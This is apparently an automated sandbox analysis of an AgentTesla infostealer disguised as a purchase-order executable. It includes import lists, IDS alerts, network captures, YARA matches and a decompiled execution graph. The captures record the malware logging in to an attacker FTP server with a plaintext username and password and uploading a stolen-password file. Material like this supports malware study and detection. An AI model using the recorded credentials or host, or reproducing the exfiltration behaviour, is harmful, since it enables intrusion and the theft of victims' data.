GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                  USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                  GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                  OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain
                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-18T13:05:49.502950+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.1249712195.252.110.25321TCP
                                                  2024-11-18T13:05:50.265914+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1249713195.252.110.25362856TCP
                                                  2024-11-18T13:05:50.271641+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1249713195.252.110.25362856TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 18, 2024 13:05:45.728693008 CET4971180192.168.2.12208.95.112.1
                                                  Nov 18, 2024 13:05:45.733848095 CET8049711208.95.112.1192.168.2.12
                                                  Nov 18, 2024 13:05:45.733942986 CET4971180192.168.2.12208.95.112.1
                                                  Nov 18, 2024 13:05:45.734827042 CET4971180192.168.2.12208.95.112.1
                                                  Nov 18, 2024 13:05:45.739837885 CET8049711208.95.112.1192.168.2.12
                                                  Nov 18, 2024 13:05:46.330044985 CET8049711208.95.112.1192.168.2.12
                                                  Nov 18, 2024 13:05:46.385318041 CET4971180192.168.2.12208.95.112.1
                                                  Nov 18, 2024 13:05:47.029654026 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:47.034619093 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:47.034694910 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:47.799549103 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:47.799830914 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:47.804763079 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.073549986 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.073771000 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:48.078913927 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.416632891 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.416913986 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:48.421829939 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.685530901 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.685837030 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:48.690773964 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.952464104 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:48.952625036 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:48.957515001 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:49.219240904 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:49.219461918 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:49.224462986 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:49.497100115 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:49.497760057 CET4971362856192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:49.502621889 CET6285649713195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:49.502758026 CET4971362856192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:49.502949953 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:49.507754087 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:50.265585899 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:50.265913963 CET4971362856192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:50.265964031 CET4971362856192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:50.270934105 CET6285649713195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:50.271532059 CET6285649713195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:50.271641016 CET4971362856192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:50.307280064 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:05:50.533606052 CET2149712195.252.110.253192.168.2.12
                                                  Nov 18, 2024 13:05:50.588571072 CET4971221192.168.2.12195.252.110.253
                                                  Nov 18, 2024 13:06:16.339785099 CET8049711208.95.112.1192.168.2.12
                                                  Nov 18, 2024 13:06:16.339921951 CET4971180192.168.2.12208.95.112.1
                                                  Nov 18, 2024 13:06:36.979397058 CET4971180192.168.2.12208.95.112.1
                                                  Nov 18, 2024 13:06:36.984889984 CET8049711208.95.112.1192.168.2.12
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 18, 2024 13:05:45.715962887 CET5340353192.168.2.121.1.1.1
                                                  Nov 18, 2024 13:05:45.723670006 CET53534031.1.1.1192.168.2.12
                                                  Nov 18, 2024 13:05:46.939896107 CET5611553192.168.2.121.1.1.1
                                                  Nov 18, 2024 13:05:47.028599024 CET53561151.1.1.1192.168.2.12
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 18, 2024 13:05:45.715962887 CET192.168.2.121.1.1.10x7267Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                  Nov 18, 2024 13:05:46.939896107 CET192.168.2.121.1.1.10x5a60Standard query (0)ftp.jeepcommerce.rsA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 18, 2024 13:05:45.723670006 CET1.1.1.1192.168.2.120x7267No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  Nov 18, 2024 13:05:47.028599024 CET1.1.1.1192.168.2.120x5a60No error (0)ftp.jeepcommerce.rs195.252.110.253A (IP address)IN (0x0001)false
                                                  • ip-api.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.1249711208.95.112.1807000C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 18, 2024 13:05:45.734827042 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Nov 18, 2024 13:05:46.330044985 CET174INHTTP/1.1 200 OK
                                                  Date: Mon, 18 Nov 2024 12:05:46 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 5
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 74 72 75 65 0a
                                                  Data Ascii: true


                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 18, 2024 13:05:47.799549103 CET2149712195.252.110.253192.168.2.12220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Nov 18, 2024 13:05:47.799830914 CET4971221192.168.2.12195.252.110.253USER w133y@jeepcommerce.rs
                                                  Nov 18, 2024 13:05:48.073549986 CET2149712195.252.110.253192.168.2.12331 User w133y@jeepcommerce.rs OK. Password required
                                                  Nov 18, 2024 13:05:48.073771000 CET4971221192.168.2.12195.252.110.253PASS Q6]7rLSD*gU2
                                                  Nov 18, 2024 13:05:48.416632891 CET2149712195.252.110.253192.168.2.12230 OK. Current restricted directory is /
                                                  Nov 18, 2024 13:05:48.685530901 CET2149712195.252.110.253192.168.2.12504 Unknown command
                                                  Nov 18, 2024 13:05:48.685837030 CET4971221192.168.2.12195.252.110.253PWD
                                                  Nov 18, 2024 13:05:48.952464104 CET2149712195.252.110.253192.168.2.12257 "/" is your current location
                                                  Nov 18, 2024 13:05:48.952625036 CET4971221192.168.2.12195.252.110.253TYPE I
                                                  Nov 18, 2024 13:05:49.219240904 CET2149712195.252.110.253192.168.2.12200 TYPE is now 8-bit binary
                                                  Nov 18, 2024 13:05:49.219461918 CET4971221192.168.2.12195.252.110.253PASV
                                                  Nov 18, 2024 13:05:49.497100115 CET2149712195.252.110.253192.168.2.12227 Entering Passive Mode (195,252,110,253,245,136)
                                                  Nov 18, 2024 13:05:49.502949953 CET4971221192.168.2.12195.252.110.253STOR PW_user-445817_2024_11_18_07_05_46.html
                                                  Nov 18, 2024 13:05:50.265585899 CET2149712195.252.110.253192.168.2.12150 Accepted data connection
                                                  Nov 18, 2024 13:05:50.533606052 CET2149712195.252.110.253192.168.2.12226-File successfully transferred
                                                  226-File successfully transferred226 0.268 seconds (measured here), 1.16 Kbytes per second

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:07:05:42
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\[Purchase Order] PO2411024.exe"
                                                  Imagebase:0x400000
                                                  File size:947'171 bytes
                                                  MD5 hash:E3D9142BC972B5C18CF65055D754730E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2501872609.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:07:05:44
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\[Purchase Order] PO2411024.exe"
                                                  Imagebase:0x470000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4938434032.000000000292E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4936860765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:high
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3.9%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:8.7%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:40
                                                    execution_graph 86080 4010e0 86083 401100 86080->86083 86082 4010f8 86084 401113 86083->86084 86085 401184 86084->86085 86086 40114c 86084->86086 86088 401120 86084->86088 86116 401182 86084->86116 86121 401250 86085->86121 86089 401151 86086->86089 86090 40119d 86086->86090 86087 40112c DefWindowProcW 86087->86082 86088->86087 86142 401000 Shell_NotifyIconW __cftof2_l 86088->86142 86092 401219 86089->86092 86093 40115d 86089->86093 86095 4011a3 86090->86095 86096 42afb4 86090->86096 86092->86088 86099 401225 86092->86099 86097 401163 86093->86097 86098 42b01d 86093->86098 86094 401193 86094->86082 86095->86088 86102 4011b6 KillTimer 86095->86102 86103 4011db SetTimer RegisterWindowMessageW 86095->86103 86137 40f190 10 API calls 86096->86137 86104 42afe9 86097->86104 86105 40116c 86097->86105 86098->86087 86141 4370f4 52 API calls 86098->86141 86153 468b0e 74 API calls __cftof2_l 86099->86153 86136 401000 Shell_NotifyIconW __cftof2_l 86102->86136 86103->86094 86108 401204 CreatePopupMenu 86103->86108 86139 40f190 10 API calls 86104->86139 86105->86088 86110 401174 86105->86110 86106 42b04f 86143 40e0c0 86106->86143 86108->86082 86138 45fd57 65 API calls __cftof2_l 86110->86138 86114 42b00e 86140 401a50 398 API calls 86114->86140 86115 4011c9 PostQuitMessage 86115->86082 86116->86087 86117 42afe4 86117->86094 86120 42afdc 86120->86087 86120->86117 86122 401262 __cftof2_l 86121->86122 86123 4012e8 86121->86123 86154 401b80 86122->86154 86123->86094 86125 40128c 86126 4012d1 KillTimer SetTimer 86125->86126 86127 4012bb 86125->86127 86128 4272ec 86125->86128 86126->86123 86129 4012c5 86127->86129 86130 42733f 86127->86130 86131 4272f4 Shell_NotifyIconW 86128->86131 86132 42731a Shell_NotifyIconW 86128->86132 86129->86126 86133 427393 Shell_NotifyIconW 86129->86133 86134 427348 Shell_NotifyIconW 86130->86134 86135 42736e Shell_NotifyIconW 86130->86135 86131->86126 86132->86126 86133->86126 86134->86126 86135->86126 86136->86115 86137->86094 86138->86120 86139->86114 86140->86116 86141->86116 86142->86106 86145 40e0e7 __cftof2_l 86143->86145 86144 40e142 86147 40e184 86144->86147 86257 4341e6 63 API calls __wcsicoll 86144->86257 86145->86144 86146 42729f DestroyIcon 86145->86146 86146->86144 86149 40e1a0 Shell_NotifyIconW 86147->86149 86150 4272db Shell_NotifyIconW 86147->86150 86151 401b80 54 API calls 86149->86151 86152 40e1ba 86151->86152 86152->86116 86153->86117 86155 401b9c 86154->86155 86175 401c7e 86154->86175 86176 4013c0 86155->86176 86158 42722b LoadStringW 86161 427246 86158->86161 86159 401bb9 86181 402160 86159->86181 86195 40e0a0 86161->86195 86162 401bcd 86164 427258 86162->86164 86165 401bda 86162->86165 86199 40d200 52 API calls 2 library calls 86164->86199 86165->86161 86166 401be4 86165->86166 86194 40d200 52 API calls 2 library calls 86166->86194 86169 427267 86170 401bf3 _wcscpy __cftof2_l _wcsncpy 86169->86170 86171 42727b 86169->86171 86174 401c62 Shell_NotifyIconW 86170->86174 86200 40d200 52 API calls 2 library calls 86171->86200 86173 427289 86174->86175 86175->86125 86201 4115d7 86176->86201 86182 426daa 86181->86182 86183 40216b _wcslen 86181->86183 86244 40c600 86182->86244 86186 402180 86183->86186 86187 40219e 86183->86187 86185 426db5 86185->86162 86238 403bd0 86186->86238 86188 4013a0 52 API calls 86187->86188 86190 4021a5 86188->86190 86192 426db7 86190->86192 86193 4115d7 52 API calls 86190->86193 86191 402187 _memmove 86191->86162 86193->86191 86194->86170 86196 40e0b2 86195->86196 86197 40e0a8 86195->86197 86196->86170 86256 403c30 52 API calls _memmove 86197->86256 86199->86169 86200->86173 86203 4115e1 _malloc 86201->86203 86204 4013e4 86203->86204 86207 4115fd std::exception::exception 86203->86207 86215 4135bb 86203->86215 86212 4013a0 86204->86212 86206 411645 86231 418105 RaiseException 86206->86231 86210 41163b 86207->86210 86229 41130a 51 API calls __cinit 86207->86229 86230 4180af 46 API calls std::exception::operator= 86210->86230 86211 411656 86213 4115d7 52 API calls 86212->86213 86214 4013a7 86213->86214 86214->86158 86214->86159 86216 413638 _malloc 86215->86216 86218 4135c9 _malloc 86215->86218 86237 417f77 46 API calls __getptd_noexit 86216->86237 86217 4135d4 86217->86218 86232 418901 46 API calls __NMSG_WRITE 86217->86232 86233 418752 46 API calls 6 library calls 86217->86233 86234 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86217->86234 86218->86217 86221 4135f7 RtlAllocateHeap 86218->86221 86224 413624 86218->86224 86227 413622 86218->86227 86221->86218 86222 413630 86221->86222 86222->86203 86235 417f77 46 API calls __getptd_noexit 86224->86235 86236 417f77 46 API calls __getptd_noexit 86227->86236 86229->86210 86230->86206 86231->86211 86232->86217 86233->86217 86235->86227 86236->86222 86237->86222 86239 403bd8 86238->86239 86241 403bd9 moneypunct 86238->86241 86239->86191 86240 4268b9 86241->86240 86242 4115d7 52 API calls 86241->86242 86243 403c18 86242->86243 86243->86191 86245 40c619 86244->86245 86246 40c60a 86244->86246 86245->86185 86246->86245 86249 4026f0 86246->86249 86248 426d7a _memmove 86248->86185 86250 426873 86249->86250 86251 4026ff 86249->86251 86252 4013a0 52 API calls 86250->86252 86251->86248 86253 42687b 86252->86253 86254 4115d7 52 API calls 86253->86254 86255 42689e _memmove 86254->86255 86255->86248 86256->86196 86257->86147 86258 42d142 86262 480a8d 86258->86262 86260 42d14f 86261 480a8d 259 API calls 86260->86261 86261->86260 86263 480ae4 86262->86263 86264 480b26 86262->86264 86265 480aeb 86263->86265 86266 480b15 86263->86266 86293 40bc70 86264->86293 86268 480aee 86265->86268 86269 480b04 86265->86269 86300 4805bf 259 API calls 86266->86300 86268->86264 86271 480af3 86268->86271 86299 47fea2 259 API calls __itow_s 86269->86299 86298 47f135 259 API calls 86271->86298 86274 40e0a0 52 API calls 86282 480b2e 86274->86282 86277 480aff 86327 408f40 86277->86327 86278 481156 86279 408f40 VariantClear 86278->86279 86280 48115e 86279->86280 86280->86260 86281 40e710 53 API calls 86281->86282 86282->86274 86282->86277 86282->86281 86285 40c2c0 52 API calls 86282->86285 86286 40a780 259 API calls 86282->86286 86287 480ff5 86282->86287 86289 408e80 VariantClear 86282->86289 86301 401980 86282->86301 86309 45377f 52 API calls 86282->86309 86310 45e951 53 API calls 86282->86310 86311 40e830 86282->86311 86324 47925f 53 API calls 86282->86324 86325 47fcff 259 API calls 86282->86325 86285->86282 86286->86282 86326 45e737 90 API calls 3 library calls 86287->86326 86289->86282 86294 4115d7 52 API calls 86293->86294 86295 40bc98 86294->86295 86296 4115d7 52 API calls 86295->86296 86297 40bca6 86296->86297 86297->86282 86298->86277 86299->86277 86300->86277 86302 4019a3 86301->86302 86306 401985 86301->86306 86303 4019b8 86302->86303 86302->86306 86332 403e10 53 API calls 86303->86332 86305 40199f 86305->86282 86306->86305 86331 403e10 53 API calls 86306->86331 86308 4019c4 86308->86282 86309->86282 86310->86282 86312 427c86 86311->86312 86313 40e84a 86311->86313 86334 40e1f0 VariantClear moneypunct 86312->86334 86333 40e950 53 API calls 86313->86333 86316 427c8b 86335 40e950 53 API calls 86316->86335 86317 40e84f 86317->86316 86318 40e85c 86317->86318 86319 4115d7 52 API calls 86318->86319 86323 40e907 86318->86323 86321 40e8fc 86319->86321 86322 4115d7 52 API calls 86321->86322 86322->86323 86323->86282 86324->86282 86325->86282 86326->86277 86330 408f48 moneypunct 86327->86330 86328 4265c7 VariantClear 86329 408f55 moneypunct 86328->86329 86329->86278 86330->86328 86330->86329 86331->86305 86332->86308 86333->86317 86334->86316 86335->86323 86336 40bd20 86340 428194 86336->86340 86341 40bd2d 86336->86341 86337 40bd43 86338 40bd37 86348 40bd50 86338->86348 86339 4281bc 86358 45e987 86 API calls moneypunct 86339->86358 86340->86337 86340->86339 86343 4281b2 86340->86343 86341->86338 86359 4531b1 85 API calls 5 library calls 86341->86359 86357 40b510 VariantClear 86343->86357 86347 4281ba 86349 426cf1 86348->86349 86350 40bd63 86348->86350 86369 44cde9 52 API calls _memmove 86349->86369 86360 40bd80 86350->86360 86353 40bd73 86353->86337 86354 426cfc 86355 40e0a0 52 API calls 86354->86355 86356 426d02 86355->86356 86357->86347 86358->86341 86359->86338 86361 40bd8e 86360->86361 86362 40bdb7 _memmove 86360->86362 86361->86362 86363 40bded 86361->86363 86364 40bdad 86361->86364 86362->86353 